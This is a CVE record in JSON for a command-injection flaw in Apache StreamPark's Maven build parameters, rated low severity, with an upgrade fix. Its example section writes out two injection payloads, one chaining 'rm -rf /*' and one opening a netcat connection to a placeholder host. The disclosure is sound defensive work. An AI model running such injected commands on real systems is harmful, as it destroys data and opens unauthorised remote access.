{"dataType":"CVE_RECORD","dataVersion":"5.1","cveMetadata":{"cveId":"CVE-2023-49898","assignerOrgId":"f0158376-9dc2-43b6-827c-5f631a4d8d09","state":"PUBLISHED","assignerShortName":"apache","dateReserved":"2023-12-01T03:12:29.421Z","datePublished":"2023-12-15T12:13:25.086Z","dateUpdated":"2024-08-02T22:09:49.388Z"},"containers":{"cna":{"affected":[{"defaultStatus":"unaffected","product":"Apache StreamPark (incubating)","vendor":"Apache Software Foundation","versions":[{"lessThan":"2.1.2","status":"affected","version":"2.0.0","versionType":"custom"}]}],"descriptions":[{"lang":"en","supportingMedia":[{"base64":false,"type":"text/html","value":"<div>In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.<br><br><div>Mitigation:<br><br></div>all users&nbsp;<span style=\"background-color: var(--wht);\">should upgrade to 2.1.2</span><div><br></div><br><div>Example:<br><br><div><p></p><div>##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &amp;&amp;, compilation failure use \"||\" or \"&amp;&amp;\":<br><br><span style=\"background-color: var(--wht);\">/usr/share/java/maven-3/conf/settings.xml || rm -rf /*</span><br></div><p></p></div></div><div><div>/usr/share/java/maven-3/conf/settings.xml &amp;&amp; nohup nc x.x.x.x 8899 &amp;</div><br></div></div><p></p>"}],"value":"In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.2\n\nExample:\n\n##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use \"||\" or \"&&\":\n\n/usr/share/java/maven-3/conf/settings.xml || rm -rf /*\n\n/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &\n\n"}],"metrics":[{"other":{"content":{"text":"low"},"type":"Textual description of severity"}}],"problemTypes":[{"descriptions":[{"cweId":"CWE-77","description":"CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')","lang":"en","type":"CWE"}]}],"providerMetadata":{"orgId":"f0158376-9dc2-43b6-827c-5f631a4d8d09","shortName":"apache","dateUpdated":"2023-12-15T12:13:25.086Z"},"references":[{"tags":["vendor-advisory"],"url":"https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"}],"source":{"discovery":"UNKNOWN"},"title":"Apache StreamPark (incubating): Authenticated system users could trigger remote command execution","x_generator":{"engine":"Vulnogram 0.1.0-dev"}},"adp":[{"providerMetadata":{"orgId":"af854a3a-2127-422b-91ae-364da2661108","shortName":"CVE","dateUpdated":"2024-08-02T22:09:49.388Z"},"title":"CVE Program Container","references":[{"tags":["vendor-advisory","x_transferred"],"url":"https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"}]}]}}